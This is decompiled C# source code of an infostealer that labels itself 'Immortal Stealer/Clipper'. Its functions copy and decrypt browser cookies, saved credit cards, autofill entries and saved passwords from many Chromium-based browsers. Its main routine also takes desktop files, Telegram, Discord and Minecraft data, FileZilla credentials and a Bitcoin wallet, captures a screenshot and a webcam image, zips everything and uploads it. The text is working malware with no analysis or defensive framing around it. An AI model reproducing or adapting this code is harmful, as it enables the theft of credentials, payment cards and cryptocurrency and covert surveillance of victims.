// Token: 0x06000005 RID: 5 private static List <Cookie> fetch_cookies(string string_0) { List <Cookie> result; if (!File.Exists(string_0)) { result = null; } else { try { string text = Path.GetTempPath() + "/" + Class8.Random_string() + ".fv"; if (File.Exists(text)) { File.Delete(text); } File.Copy(string_0, text, true); SqlHandler sqlHandler = new SqlHandler(text); sqlHandler.ReadTable("cookies"); List <Cookie> list = new List <Cookie>(); for (int i = 0; i < sqlHandler.GetRowCount(); i++) { try { string value = string.Empty; try { value = Encoding.UTF8.GetString(Chromium.DecryptChromium(Encoding.Default.GetBytes(sqlHandler.GetValue(i, 12)), null)); } catch (Exception) { } bool flag; bool.TryParse(sqlHandler.GetValue(i, 6), out flag); list.Add(new Cookie { domain = sqlHandler.GetValue(i, 1), name = sqlHandler.GetValue(i, 2), path = sqlHandler.GetValue(i, 4), expirationDate = sqlHandler.GetValue(i, 5), secure = flag.ToString().ToUpper(), value = value, hostOnly = "TRUE" }); } catch (Exception ex) { Console.WriteLine(ex.ToString()); } } result = list; } catch { result = new List <Cookie>(); } } return(result); }
// Token: 0x06000058 RID: 88 private static List <CardData> fetch_cookies(string string_0) { List <CardData> result; if (!File.Exists(string_0)) { result = null; } else { try { string text = Path.GetTempPath() + "/" + Class8.Random_string() + ".fv"; if (File.Exists(text)) { File.Delete(text); } File.Copy(string_0, text, true); SqlHandler sqlHandler = new SqlHandler(text); sqlHandler.ReadTable("CC"); List <CardData> list = new List <CardData>(); for (int i = 0; i < sqlHandler.GetRowCount(); i++) { try { string number = string.Empty; try { number = Encoding.UTF8.GetString(Chromium.DecryptChromium(Encoding.Default.GetBytes(sqlHandler.GetValue(i, 12)), null)); } catch (Exception) { } bool flag; bool.TryParse(sqlHandler.GetValue(i, 6), out flag); list.Add(new CardData { Name = sqlHandler.GetValue(i, 1), Exp_m = sqlHandler.GetValue(i, 2), Exp_y = sqlHandler.GetValue(i, 3), Number = number, Billing = sqlHandler.GetValue(i, 9) }); } catch (Exception ex) { Console.WriteLine(ex.ToString()); } } result = list; } catch { result = new List <CardData>(); } } return(result); }
// Token: 0x06000044 RID: 68 RVA: 0x0000559C File Offset: 0x0000379C private static List <FormData> smethod_1(string string_0) { List <FormData> result; if (!File.Exists(string_0)) { result = null; } else { try { string text = Path.GetTempPath() + "/" + Class8.Random_string() + ".fv"; if (File.Exists(text)) { File.Delete(text); } File.Copy(string_0, text, true); SqlHandler sqlHandler = new SqlHandler(text); sqlHandler.ReadTable("Autofill"); List <FormData> list = new List <FormData>(); for (int i = 0; i < sqlHandler.GetRowCount(); i++) { try { try { Encoding.UTF8.GetString(Chromium.DecryptChromium(Encoding.Default.GetBytes(sqlHandler.GetValue(i, 12)), null)); } catch (Exception) { } bool flag; bool.TryParse(sqlHandler.GetValue(i, 6), out flag); list.Add(new FormData { Name = sqlHandler.GetValue(i, 0), Value = sqlHandler.GetValue(i, 1) }); } catch (Exception ex) { Console.WriteLine(ex.ToString()); } } result = list; } catch { result = new List <FormData>(); } } return(result); }
// Token: 0x06000029 RID: 41 public static void stealer_main_routine() { string text = Class8.Random_string(); string text2 = Path.GetTempPath() + text; Directory.CreateDirectory(text2); using (StreamWriter streamWriter = new StreamWriter(text2 + "\\passwords.log")) { streamWriter.WriteLine(string.Concat(new string[] { "[==================== Immortal Stealer/Clipper ====================]\r\n[=================== Create By Zet5D ===================]\r\n[=================== Telegram: @Zet5D ===================]\r\n", string.Format("Date: {0}\r\n", DateTime.Now), string.Format("Windows Username: {0}\r\n", Environment.UserName), string.Format("HWID: {0}\r\n", Class2.hwid), string.Format("System: {0}\r\n", Class9.define_windows()) })); try { foreach (PassData value in Chromium.Initialise()) { streamWriter.WriteLine(value); } } catch { } } try { Class9.grab_desktop(text2); } catch (Exception ex) { Console.WriteLine(ex.ToString()); } try { Class9.grab_minecraft(text2); } catch (Exception) { } try { Class9.grab_telegram(text2); } catch (Exception) { } try { Class9.grab_discord(text2); } catch (Exception) { } try { Class9.get_screenshot(text2 + "\\desktop.jpg"); } catch (Exception ex2) { Console.WriteLine(ex2.ToString()); } try { Class9.Class10.get_webcam(text2 + "\\CamPicture.png"); } catch (Exception ex3) { Console.WriteLine(ex3.ToString()); } try { Class4.grab_cookies(text2 + "\\"); } catch (Exception ex4) { Console.WriteLine(ex4.ToString()); } try { Class14.grab_cards(text2 + "\\"); } catch (Exception ex5) { Console.WriteLine(ex5.ToString()); } try { GrabForms.grab_forms(text2 + "\\"); } catch (Exception ex6) { Console.WriteLine(ex6.ToString()); } try { Class6.Class7.get_filezilla(text2 + "\\"); } catch (Exception ex7) { Console.WriteLine(ex7.ToString()); } try { string bitcoin = CryptoWallets.get_bitcoin(); if (bitcoin != "" && File.Exists(bitcoin)) { File.Copy(bitcoin, text2 + "\\wallet.dat"); } } catch (Exception ex8) { Console.WriteLine(ex8.ToString()); } try { Class9.zip_folder(text2, Path.GetTempPath() + "\\" + text + ".zip"); } catch (Exception ex9) { Console.WriteLine(ex9.ToString()); } try { Class9.delete_folder(text2); } catch (Exception ex10) { Console.WriteLine(ex10.ToString()); } try { Internet.upload_file(Path.GetTempPath() + "\\" + text + ".zip"); } catch (Exception ex11) { Console.WriteLine(ex11.ToString()); } }
// Token: 0x06000019 RID: 25 RVA: 0x000030F8 File Offset: 0x000012F8 private static List <PassData> smethod_0(string string_0) { List <PassData> result; if (!File.Exists(string_0)) { result = null; } else { string program = ""; if (string_0.Contains("Chrome")) { program = "Google Chrome"; } if (string_0.Contains("Yandex")) { program = "Yandex Browser"; } if (string_0.Contains("Orbitum")) { program = "Orbitum Browser"; } if (string_0.Contains("Opera")) { program = "Opera Browser"; } if (string_0.Contains("Amigo")) { program = "Amigo Browser"; } if (string_0.Contains("Torch")) { program = "Torch Browser"; } if (string_0.Contains("Comodo")) { program = "Comodo Browser"; } if (string_0.Contains("CentBrowser")) { program = "CentBrowser"; } if (string_0.Contains("Go!")) { program = "Go!"; } if (string_0.Contains("uCozMedia")) { program = "uCozMedia"; } if (string_0.Contains("MapleStudio")) { program = "MapleStudio"; } if (string_0.Contains("BlackHawk")) { program = "BlackHawk"; } if (string_0.Contains("CoolNovo")) { program = "CoolNovo"; } if (string_0.Contains("Vivaldi")) { program = "Vivaldi"; } if (string_0.Contains("Sputnik")) { program = "Sputnik"; } if (string_0.Contains("Maxthon")) { program = "Maxthon"; } if (string_0.Contains("AcWebBrowser")) { program = "AcWebBrowser"; } if (string_0.Contains("Epic Browser")) { program = "Epic Browser"; } if (string_0.Contains("Baidu Spark")) { program = "Baidu Spark"; } if (string_0.Contains("Rockmelt")) { program = "Rockmelt"; } if (string_0.Contains("Sleipnir")) { program = "Sleipnir"; } if (string_0.Contains("SRWare Iron")) { program = "SRWare Iron"; } if (string_0.Contains("Titan Browser")) { program = "Titan Browser"; } if (string_0.Contains("Flock")) { program = "Flock"; } try { string text = Path.GetTempPath() + "/" + Class8.Random_string() + ".fv"; if (File.Exists(text)) { File.Delete(text); } File.Copy(string_0, text, true); SqlHandler sqlHandler = new SqlHandler(text); List <PassData> list = new List <PassData>(); sqlHandler.ReadTable("logins"); for (int i = 0; i < sqlHandler.GetRowCount(); i++) { try { string text2 = string.Empty; try { text2 = Encoding.UTF8.GetString(Chromium.DecryptChromium(Encoding.Default.GetBytes(sqlHandler.GetValue(i, 5)), null)); } catch (Exception) { } if (text2 != "") { list.Add(new PassData { Url = sqlHandler.GetValue(i, 1).Replace("https://", "").Replace("http://", ""), Login = sqlHandler.GetValue(i, 3), Password = text2, Program = program }); } } catch (Exception ex) { Console.WriteLine(ex.ToString()); } } File.Delete(text); result = list; } catch (Exception ex2) { Console.WriteLine(ex2.ToString()); result = null; } } return(result); }